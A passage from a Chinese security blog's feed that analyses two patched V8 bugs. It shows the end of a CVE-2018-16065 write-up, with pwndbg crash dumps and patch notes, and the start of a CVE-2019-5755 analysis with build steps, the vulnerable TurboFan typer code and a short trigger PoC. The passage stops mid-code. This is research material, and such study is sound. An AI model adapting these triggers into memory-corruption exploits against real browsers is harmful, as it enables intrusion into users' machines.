class="code"><pre><span class="line">pwndbg&gt; r</span><br><span class="line">Starting program: /usr/class/v8/v8/out/x64.debug/d8 --allow-natives-syntax --expose-gc test.js</span><br><span class="line">[Thread debugging using libthread_db enabled]</span><br><span class="line">Using host libthread_db library <span class="string">&quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;</span>.</span><br><span class="line">[New Thread 0x7fe86accc700 (LWP 84765)]</span><br><span class="line">[New Thread 0x7fe86a4cb700 (LWP 84766)]</span><br><span class="line">[New Thread 0x7fe869cca700 (LWP 84767)]</span><br><span class="line">[New Thread 0x7fe8694c9700 (LWP 84768)]</span><br><span class="line">[New Thread 0x7fe868cc8700 (LWP 84769)]</span><br><span class="line">[New Thread 0x7fe8684c7700 (LWP 84770)]</span><br><span class="line">[New Thread 0x7fe867cc6700 (LWP 84771)]</span><br><span class="line">callback</span><br><span class="line"></span><br><span class="line">Thread 1 <span class="string">&quot;d8&quot;</span> received signal SIGSEGV, Segmentation fault.</span><br><span class="line">tcache_get (tc_idx=4) at malloc.c:2951</span><br><span class="line">2951      --(tcache-&gt;counts[tc_idx]);</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">─────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────</span><br><span class="line"> RAX  0x5606a95b6030 ◂— 0x10000</span><br><span class="line"> RBX  0x4</span><br><span class="line"> RCX  0x5606a95b6018 ◂— 0x10001</span><br><span class="line"> RDX  0x0</span><br><span class="line"> RDI  0x58</span><br><span class="line"> RSI  0x7ffe89539b58 —▸ 0x5606a95d2ef0 —▸ 0x7ffe8953ba10 ◂— 0x5606a95d2ef0</span><br><span class="line"> R8   0xdeadbeef</span><br><span class="line"> R9   0x7ffe89539b6c ◂— 0x89539df800000002</span><br><span class="line"> R10  0x58</span><br><span class="line"> R11  0x58</span><br><span class="line"> R12  0xffffffffffffffa8</span><br><span class="line"> R13  0x5606a95d2fb8 —▸ 0x283c80e82ba9 ◂— 0x283c80e822</span><br><span class="line"> R14  0x5</span><br><span class="line"> R15  0x7ffe8953ab08 —▸ 0x354172782e39 ◂— 0xb1000005ceeae0ae</span><br><span class="line"> RBP  0x58</span><br><span class="line"> RSP  0x7ffe89539990 —▸ 0x7fe86cf8d220 ◂— push   rbp</span><br><span class="line"> RIP  0x7fe86b7227be (malloc+286) ◂— mov    rsi, qword ptr [r8]</span><br><span class="line">───────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────</span><br><span class="line"> ► 0x7fe86b7227be &lt;malloc+286&gt;    mov    rsi, qword ptr [r8]</span><br><span class="line">   0x7fe86b7227c1 &lt;malloc+289&gt;    mov    qword ptr [rax + 0x80], rsi</span><br><span class="line">   0x7fe86b7227c8 &lt;malloc+296&gt;    mov    word ptr [rcx], dx</span><br><span class="line">   0x7fe86b7227cb &lt;malloc+299&gt;    mov    qword ptr [r8 + 8], 0</span><br><span class="line">   0x7fe86b7227d3 &lt;malloc+307&gt;    jmp    malloc+184 &lt;malloc+184&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x7fe86b722758 &lt;malloc+184&gt;    pop    rbx</span><br><span class="line">   0x7fe86b722759 &lt;malloc+185&gt;    mov    rax, r8</span><br><span class="line">   0x7fe86b72275c &lt;malloc+188&gt;    pop    rbp</span><br><span class="line">   0x7fe86b72275d &lt;malloc+189&gt;    pop    r12</span><br><span class="line">   0x7fe86b72275f &lt;malloc+191&gt;    ret    </span><br><span class="line"> </span><br><span class="line">   0x7fe86b722760 &lt;malloc+192&gt;    and    rax, 0xfffffffffffffff0</span><br><span class="line">───────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────</span><br><span class="line">In file: /build/glibc-TrjWJf/glibc-2.29/malloc/malloc.c</span><br><span class="line">   2946 &#123;</span><br><span class="line">   2947   tcache_entry *e = tcache-&gt;entries[tc_idx];</span><br><span class="line">   2948   assert (tc_idx &lt; TCACHE_MAX_BINS);</span><br><span class="line">   2949   assert (tcache-&gt;entries[tc_idx] &gt; 0);</span><br><span class="line">   2950   tcache-&gt;entries[tc_idx] = e-&gt;next;</span><br><span class="line"> ► 2951   --(tcache-&gt;counts[tc_idx]);</span><br><span class="line">   2952   e-&gt;key = NULL;</span><br><span class="line">   2953   <span class="built_in">return</span> (void *) e;</span><br><span class="line">   2954 &#125;</span><br><span class="line">   2955 </span><br><span class="line">   2956 static void</span><br><span class="line">───────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────</span><br><span class="line">00:0000│ rsp  0x7ffe89539990 —▸ 0x7fe86cf8d220 ◂— push   rbp</span><br><span class="line">01:0008│      0x7ffe89539998 —▸ 0x7ffe895399e0 —▸ 0x7ffe89539aa0 —▸ 0x7ffe89539de0 —▸ 0x7ffe89539e00 ◂— ...</span><br><span class="line">02:0010│      0x7ffe895399a0 ◂— 0xffffffffffffffff</span><br><span class="line">03:0018│      0x7ffe895399a8 —▸ 0x7fe86bb459d8 ◂— mov    qword ptr [rbp - 0x10], rax</span><br><span class="line">04:0020│      0x7ffe895399b0 ◂— 0x2a100</span><br><span class="line">05:0028│      0x7ffe895399b8 —▸ 0x5606a962c3d0 ◂— 0x0</span><br><span class="line">06:0030│      0x7ffe895399c0 —▸ 0x5606a962c370 ◂— 0x0</span><br><span class="line">07:0038│      0x7ffe895399c8 —▸ 0x5606a962d3f0 —▸ 0x7fe86e241580 —▸ 0x7fe86d76e780 (v8::internal::CodeSpace::~CodeSpace()) ◂— push   rbp</span><br><span class="line">─────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────</span><br><span class="line"> ► f 0     7fe86b7227be malloc+286</span><br><span class="line">   f 1     7fe86b7227be malloc+286</span><br><span class="line">   f 2     7fe86bb459d8</span><br><span class="line">   f 3     7fe86d823957</span><br><span class="line">   f 4     7fe86d8209a1</span><br><span class="line">   f 5     7fe86d8168de</span><br><span class="line">   f 6     7fe86d816309 v8::internal::Sweeper::StartSweeperTasks()+857</span><br><span class="line">   f 7     7fe86d7932b7 v8::internal::MarkCompactCollector::Finish()+343</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</span><br></pre></td></tr></table></figure></li><li><p>第二种</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; r</span><br><span class="line">Starting program: /usr/class/v8/v8/out/x64.debug/d8 --allow-natives-syntax --expose-gc test.js</span><br><span class="line">[Thread debugging using libthread_db enabled]</span><br><span class="line">Using host libthread_db library <span class="string">&quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;</span>.</span><br><span class="line">[New Thread 0x7f1802341700 (LWP 87692)]</span><br><span class="line">[New Thread 0x7f1801b40700 (LWP 87693)]</span><br><span class="line">[New Thread 0x7f180133f700 (LWP 87694)]</span><br><span class="line">[New Thread 0x7f1800b3e700 (LWP 87695)]</span><br><span class="line">[New Thread 0x7f180033d700 (LWP 87696)]</span><br><span class="line">[New Thread 0x7f17ffb3c700 (LWP 87697)]</span><br><span class="line">[New Thread 0x7f17ff33b700 (LWP 87698)]</span><br><span class="line">callback</span><br><span class="line"></span><br><span class="line">Thread 1 <span class="string">&quot;d8&quot;</span> received signal SIGSEGV, Segmentation fault.</span><br><span class="line">0x00007f180468f76b <span class="keyword">in</span> std::__1::__hash_table&lt;std::__1::__hash_value_type&lt;unsigned long, v8::internal::Cancelable*&gt;, std::__1::__unordered_map_hasher&lt;unsigned long, std::__1::__hash_value_type&lt;unsigned long, v8::internal::Cancelable*&gt;, std::__1::<span class="built_in">hash</span>&lt;unsigned long&gt;, <span class="literal">true</span>&gt;, std::__1::__unordered_map_equal&lt;unsigned long, std::__1::__hash_value_type&lt;unsigned long, v8::internal::Cancelable*&gt;, std::__1::equal_to&lt;unsigned long&gt;, <span class="literal">true</span>&gt;, std::__1::allocator&lt;std::__1::__hash_value_type&lt;unsigned long, v8::internal::Cancelable*&gt; &gt; &gt;::__emplace_unique_key_args&lt;unsigned long, std::__1::piecewise_construct_t const&amp;, std::__1::tuple&lt;unsigned long const&amp;&gt;, std::__1::tuple&lt;&gt; &gt;(unsigned long const&amp;, std::__1::piecewise_construct_t const&amp;, std::__1::tuple&lt;unsigned long const&amp;&gt;&amp;&amp;, std::__1::tuple&lt;&gt;&amp;&amp;) (this=0x559480f98fc8, __k=@0x7ffd622fe4c8: 22, __args=..., __args=..., __args=...) at ../../buildtools/third_party/libc++/trunk/include/__hash_table:2010       </span><br><span class="line">2010                <span class="keyword">for</span> (__nd = __nd-&gt;__next_; __nd != nullptr &amp;&amp;</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">─────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────</span><br><span class="line"> RAX  0xdeadbeef</span><br><span class="line"> RBX  0x7f1804602220 ◂— push   rbp</span><br><span class="line"> RCX  0x559480f98fc8 —▸ 0x559480ff5c50 ◂— 0xdeadbeef</span><br><span class="line"> RDX  0x0</span><br><span class="line"> RDI  0x7ffd622fe4c8 ◂— 0x16</span><br><span class="line"> RSI  0x16</span><br><span class="line"> R8   0x559480f99020 ◂— 0x1</span><br><span class="line"> R9   0x10</span><br><span class="line"> R10  0x0</span><br><span class="line"> R11  0x7f1802ecaca0 (main_arena+96) —▸ 0x559481034310 ◂— 0x0</span><br><span class="line"> R12  0xffffffffffffffff</span><br><span class="line"> R13  0x559480f8efb8 —▸ 0xba4cbf82ba9 ◂— 0xba4cbf822</span><br><span class="line"> R14  0x5</span><br><span class="line"> R15  0x7ffd622ffc08 —▸ 0x1d3adb982e39 ◂— 0xb10000254d0fb8ae</span><br><span class="line"> RBP  0x7ffd622fe480 —▸ 0x7ffd622fe560 —▸ 0x7ffd622fe590 —▸ 0x7ffd622fe5c0 —▸ 0x7ffd622fe5f0 ◂— ...</span><br><span class="line"> RSP  0x7ffd622fdd60 —▸ 0x7ffd622fdf90 ◂— 0x0</span><br><span class="line"> RIP  0x7f180468f76b ◂— mov    rax, qword ptr [rax]</span><br><span class="line">───────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────</span><br><span class="line"> ► 0x7f180468f76b    mov    rax, qword ptr [rax]</span><br><span class="line">   0x7f180468f76e    mov    qword ptr [rbp - 0x598], rax</span><br><span class="line">   0x7f180468f775    xor    eax, eax</span><br><span class="line">   0x7f180468f777    mov    cl, al</span><br><span class="line">   0x7f180468f779    cmp    qword ptr [rbp - 0x598], 0</span><br><span class="line">   0x7f180468f781    mov    byte ptr [rbp - 0x689], cl</span><br><span class="line">   0x7f180468f787    je     0x7f180468f88e &lt;0x7f180468f88e&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x7f180468f88e    mov    al, byte ptr [rbp - 0x689]</span><br><span class="line">   0x7f180468f894    <span class="built_in">test</span>   al, 1</span><br><span class="line">   0x7f180468f896    jne    0x7f180468f8a1 &lt;0x7f180468f8a1&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x7f180468f8a1    mov    rax, qword ptr [rbp - 0x678]</span><br><span class="line">───────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────</span><br><span class="line">In file: /usr/class/v8/v8/buildtools/third_party/libc++/trunk/include/__hash_table</span><br><span class="line">   2005     &#123;</span><br><span class="line">   2006         __chash = __constrain_hash(__hash, __bc);</span><br><span class="line">   2007         __nd = __bucket_list_[__chash];</span><br><span class="line">   2008         <span class="keyword">if</span> (__nd != nullptr)</span><br><span class="line">   2009         &#123;</span><br><span class="line"> ► 2010             <span class="keyword">for</span> (__nd = __nd-&gt;__next_; __nd != nullptr &amp;&amp;</span><br><span class="line">   2011                 (__nd-&gt;__hash() == __hash || __constrain_hash(__nd-&gt;__hash(), __bc) == __chash);</span><br><span class="line">   2012                                                            __nd = __nd-&gt;__next_)</span><br><span class="line">   2013             &#123;</span><br><span class="line">   2014                 <span class="keyword">if</span> (key_eq()(__nd-&gt;__upcast()-&gt;__value_, __k))</span><br><span class="line">   2015                     goto __done;</span><br><span class="line">───────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────</span><br><span class="line">00:0000│ rsp  0x7ffd622fdd60 —▸ 0x7ffd622fdf90 ◂— 0x0</span><br><span class="line">01:0008│      0x7ffd622fdd68 —▸ 0x559481012378 —▸ 0x559481012310 —▸ 0x7f18058b3d60 —▸ 0x7f180483bc10 (v8::internal::Sweeper::IncrementalSweeperTask::~IncrementalSweeperTask()) ◂— ...                                                                                          </span><br><span class="line">02:0010│      0x7ffd622fdd70 ◂— 0x0</span><br><span class="line">03:0018│      0x7ffd622fdd78 —▸ 0x7ffd622fe450 —▸ 0x559480f99020 ◂— 0x1</span><br><span class="line">04:0020│      0x7ffd622fdd80 ◂— 9 /* <span class="string">&#x27;\t&#x27;</span> */</span><br><span class="line">... ↓</span><br><span class="line">06:0030│      0x7ffd622fdd90 —▸ 0x559481012360 —▸ 0x5594810122e0 —▸ 0x559480fd85d0 —▸ 0x559480ff43e0 ◂— ...</span><br><span class="line">07:0038│      0x7ffd622fdd98 —▸ 0x559480fe96d0 —▸ 0x559480fe9700 ◂— 0x0</span><br><span class="line">─────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────</span><br><span class="line"> ► f 0     7f180468f76b</span><br><span class="line">   f 1     7f180468f76b</span><br><span class="line">   f 2     7f180468e086 v8::internal::CancelableTaskManager::Register(v8::internal::Cancelable*)+502</span><br><span class="line">   f 3     7f180468de7a v8::internal::Cancelable::Cancelable(v8::internal::CancelableTaskManager*)+106</span><br><span class="line">   f 4     7f180468f237 v8::internal::CancelableTask::CancelableTask(v8::internal::CancelableTaskManager*)+39</span><br><span class="line">   f 5     7f180468f200 v8::internal::CancelableTask::CancelableTask(v8::internal::Isolate*)+48</span><br><span class="line">   f 6     7f1804d79983</span><br><span class="line">   f 7     7f1804d71c98</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</span><br></pre></td></tr></table></figure></li></ul></li></ul><h2 id="五、后记">五、后记</h2><p>该漏洞的<a href="https://chromium.googlesource.com/v8/v8.git/+/7d47839dc062b69467f58c55aab7cc9abf78d687">补丁</a>非常简单：将调用 ToBigInt 函数的那一行语句，提至条件判断语句之前。这样就可以使 user JS callback 导致的 Neutered 也被 if 条件判断给捕获。</p><h2 id="六、参考">六、参考</h2><ul><li><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=867776">Issue 867776: V8 OOB write BigInt64Array.of and BigInt64Array.from side effect neuter</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;一、前言&lt;/h2&gt;
&lt;p&gt;CVE-2018-16065 是 v8 中 &lt;code&gt;EmitBigTypedArrayElementStore&lt;/code&gt; 函数内部的一个漏洞。该漏洞在检查相应 ArrayBuffer 是否被 Detach（即是否是&lt;code&gt;neutered&lt;/code&gt;）之后，执行了一个带有&lt;strong&gt;副作用&lt;/strong&gt;的（即&lt;strong&gt;可调用用户 JS callback 代码&lt;/strong&gt;的） &lt;code&gt;ToBigInt&lt;/code&gt; 函数。而用户可在对应回调函数中将原先通过上述检查的 BigIntArray （即&lt;strong&gt;不是 neutered 的 TypedArray&lt;/strong&gt;）重新变成 &lt;code&gt;neutered&lt;/code&gt;。&lt;/p&gt;
&lt;p&gt;这将使一部分数据被非法写入至一块已经 Detached 的 ArrayBuffer上。如果 GC 试图回收该 ArrayBuffer 的 backing store ，则会触发 CRASH。&lt;/p&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2019-5755 分析</title>
    <link href="https://kiprey.github.io/2021/02/CVE-2019-5755/"/>
    <id>https://kiprey.github.io/2021/02/CVE-2019-5755/</id>
    <published>2021-02-13T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.755Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">一、前言</h2><ul><li><p>CVE-2019-5755 是一个位于 v8 turboFan 的类型信息缺失漏洞。该漏洞将导致 SpeculativeSafeIntegerSubtract 的计算结果缺失 MinusZero （即 -0）这种类型。这将允许 turboFan 计算出错误的 Range 并可进一步构造出越界读写原语，乃至执行 shellcode。</p></li><li><p>复现用的 v8 版本为 <code>7.1.302.28</code> （或者commit ID <code>a62e9dd69957d9b1d0a56f825506408960a283fc</code> 前的版本也可）</p></li></ul><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><ul><li><p>切换 v8 版本，然后编译：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git checkout 7.1.302.28</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line">ninja -C out.gn/x64.debug  </span><br></pre></td></tr></table></figure></li><li><p>启动 turbolizer。如果原先版本的 turbolizer 无法使用，则可以使用在线版本的 <a href="https://v8.github.io/tools/head/turbolizer/index.html">turbolizer</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> tools/turbolizer</span><br><span class="line">npm i</span><br><span class="line">npm run-script build</span><br><span class="line">python -m SimpleHTTPServer 8000&amp;</span><br><span class="line">google-chrome http://127.0.0.1:8000</span><br></pre></td></tr></table></figure></li></ul><h2 id="三、漏洞细节">三、漏洞细节</h2><ul><li><p>turboFan 的 Typer 将 SpeculativeSafeIntegerSubtract 的类型设置为与 kSafeInteger 的交集，<strong>但这里没有考虑到 <code>-0</code> （即 MinusZero）的情况。</strong> 例如：算式 <code>((-0) - 0)</code> 应该返回 <code>-0</code>，但是由于 Typer 取的是两 个类型的交集，因此 typer 将忽略 MinusZero (-0) 的这种情况。而这种 wrong case 可以用来执行错误的范围计算。</p><p>以下是 SpeculativeSafeIntegerSubtract 函数（漏洞函数）以及 SpeculativeSafeIntegerAdd 函数（对照函数）的源码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Type <span class="title">OperationTyper::SpeculativeSafeIntegerAdd</span><span class="params">(Type lhs, Type rhs)</span> </span>&#123;</span><br><span class="line">  Type result = <span class="built_in">SpeculativeNumberAdd</span>(lhs, rhs);</span><br><span class="line">  <span class="comment">// If we have a Smi or Int32 feedback, the representation selection will</span></span><br><span class="line">  <span class="comment">// either truncate or it will check the inputs (i.e., deopt if not int32).</span></span><br><span class="line">  <span class="comment">// In either case the result will be in the safe integer range, so we</span></span><br><span class="line">  <span class="comment">// can bake in the type here. This needs to be in sync with</span></span><br><span class="line">  <span class="comment">// SimplifiedLowering::VisitSpeculativeAdditiveOp.</span></span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Intersect</span>(result, cache_.kSafeIntegerOrMinusZero, <span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">Type <span class="title">OperationTyper::SpeculativeSafeIntegerSubtract</span><span class="params">(Type lhs, Type rhs)</span> </span>&#123;</span><br><span class="line">  Type result = <span class="built_in">SpeculativeNumberSubtract</span>(lhs, rhs);</span><br><span class="line">  <span class="comment">// If we have a Smi or Int32 feedback, the representation selection will</span></span><br><span class="line">  <span class="comment">// either truncate or it will check the inputs (i.e., deopt if not int32).</span></span><br><span class="line">  <span class="comment">// In either case the result will be in the safe integer range, so we</span></span><br><span class="line">  <span class="comment">// can bake in the type here. This needs to be in sync with</span></span><br><span class="line">  <span class="comment">// SimplifiedLowering::VisitSpeculativeAdditiveOp.</span></span><br><span class="line">    </span><br><span class="line">  <span class="comment">/* </span></span><br><span class="line"><span class="comment">    给左右操作数相减的结果（即变量 result）与 `kSafeInteger`类型 相交，返回 **交集** 。</span></span><br><span class="line"><span class="comment">    !!! 注意这里，使用的是 cache_.kSafeInteger</span></span><br><span class="line"><span class="comment">    与上面SpeculativeSafeIntegerAdd函数使用的cache_.kSafeIntegerOrMinusZero不一致</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">  <span class="keyword">return</span> result = Type::<span class="built_in">Intersect</span>(result, cache_.kSafeInteger, <span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>以下是该漏洞的 PoC：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>((trigger ? -<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>, -<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">return</span> idx;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">false</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><p>正常来说，<code>foo(true)</code>应该始终返回 true （因为 $-0 - 0 = -0$），但优化后产生的结果却是 false。</p><p>我们可以观察一下 turbolizer 中的信息：</p><p><img src="/2021/02/CVE-2019-5755/poc_turbolizer.png" alt="img"></p><p>可以看到，对于 $${MinusZero | Range(0,0)} - Range(0,0)$$ 这种情况，SpeculativeSafeIntegerSubtract 的 Type 中并没有 MinusZero 这种类型。</p><p>因此，turboFan 将始终在 <code>TypedLoweringPhase - TypedOptimization::ReduceSameValue</code>中，把SameValue 结点优化成 false，因为 $MinusZero \ne Range(0, 0)$。</p><p><img src="/2021/02/CVE-2019-5755/samevalue_turbolizer.png" alt="img"></p></li><li><p>SameValue 结点是通过 JS 中<code>Object.is</code> 函数调用来生成的，其目的是用于判断左右操作数是否相同。</p><p>具体来说是通过以下调用链生成：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">InliningPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    Reduction <span class="title">JSCallReducer::ReduceJSCall</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      Reduction <span class="title">JSCallReducer::ReduceObjectIs</span><span class="params">(Node* node)</span></span></span><br></pre></td></tr></table></figure><p>其中，函数 ReduceObjectIs 的源码如下:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ES section #sec-object.is</span></span><br><span class="line"><span class="function">Reduction <span class="title">JSCallReducer::ReduceObjectIs</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(IrOpcode::kJSCall, node-&gt;<span class="built_in">opcode</span>());</span><br><span class="line">  CallParameters <span class="type">const</span>&amp; params = <span class="built_in">CallParametersOf</span>(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">  <span class="type">int</span> <span class="type">const</span> argc = <span class="built_in">static_cast</span>&lt;<span class="type">int</span>&gt;(params.<span class="built_in">arity</span>() - <span class="number">2</span>);</span><br><span class="line">  Node* lhs = (argc &gt;= <span class="number">1</span>) ? NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">2</span>)</span><br><span class="line">                          : <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">UndefinedConstant</span>();</span><br><span class="line">  Node* rhs = (argc &gt;= <span class="number">2</span>) ? NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">3</span>)</span><br><span class="line">                          : <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">UndefinedConstant</span>();</span><br><span class="line">  <span class="comment">// 生成 SameValue Node</span></span><br><span class="line">  Node* value = <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">simplified</span>()-&gt;<span class="built_in">SameValue</span>(), lhs, rhs);</span><br><span class="line">  <span class="built_in">ReplaceWithValue</span>(node, value);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">Replace</span>(value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Typer 将在 TyperPhase 阶段试着计算出 SameValue 结点的类型，它将沿着以下调用链</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeSameValue</span>(Node* node)</span><br><span class="line">  Type Typer::Visitor::<span class="built_in">SameValueTyper</span>(Type lhs, Type rhs, Typer* t)</span><br><span class="line">    <span class="function">Type <span class="title">OperationTyper::SameValue</span><span class="params">(Type lhs, Type rhs)</span></span></span><br></pre></td></tr></table></figure><p>调用到<code>OperationTyper::SameValue</code>函数并计算其类型：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Type <span class="title">OperationTyper::SameValue</span><span class="params">(Type lhs, Type rhs)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">JSType</span>(lhs).<span class="built_in">Maybe</span>(<span class="built_in">JSType</span>(rhs))) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  <span class="keyword">if</span> (lhs.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span class="keyword">if</span> (rhs.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) <span class="keyword">return</span> <span class="built_in">singleton_true</span>();</span><br><span class="line">    <span class="keyword">if</span> (!rhs.<span class="built_in">Maybe</span>(Type::<span class="built_in">NaN</span>())) <span class="keyword">return</span> <span class="built_in">singleton_false</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> 